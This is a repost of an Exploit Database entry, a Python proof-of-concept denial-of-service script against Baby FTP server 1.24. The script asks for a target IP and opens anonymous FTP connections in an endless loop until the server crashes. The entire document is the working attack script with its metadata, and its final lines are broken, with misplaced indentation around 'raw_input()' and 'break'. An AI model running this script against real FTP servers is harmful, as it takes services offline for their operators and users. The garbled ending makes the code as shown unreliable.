Baby FTP server 1.24 – Denial of Service (2)

• Exploit Database
• 20 阅读

• 作者： n30m1nd
  日期： 2016-10-27
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/40639/

• #!/usr/bin/python
  
  ### Baby FTP 1.24 - Denial of Service by n30m1nd ### 
  
  # Date: 2016-10-27
  # PoC Author: n30m1nd
  # Vendor Homepage: http://www.pablosoftwaresolutions.com/
  # Software Link: http://www.pablosoftwaresolutions.com/download.php?id=1
  # Version: 1.24
  # Tested on: Win7 64bit and Win10 64 bit
  
  # Credits
  # =======
  # Shouts to the crew at Offensive Security for their huge efforts on making	the infosec community better
  
  # How to
  # ======
  # * Run this python script and write the IP to attack.
  
  # Why?
  # ====
  # The FTP Server can't handle more than ~1505 connections at the same time
  
  # Exploit code
  # ============
  
  import socket
  
  ip = raw_input("[+] IP to attack: ")
  
  sarr = []
  i = 0
  while True:
  	try:
  		sarr.append(socket.create_connection((ip,21)))
  		print "[+] Connection %d" % i
  		crash1 = "A"*500
  
  		sarr[i].send("USER anonymous\r\n" )
  		sarr[i].recv(4096)
  
  		sarr[i].send("PASS n30m1nd\r\n" )
  		sarr[i].recv(4096)
  		i+=1
  	except socket.error:
  		print "[*] Server crashed!!"
  raw_input()
  		break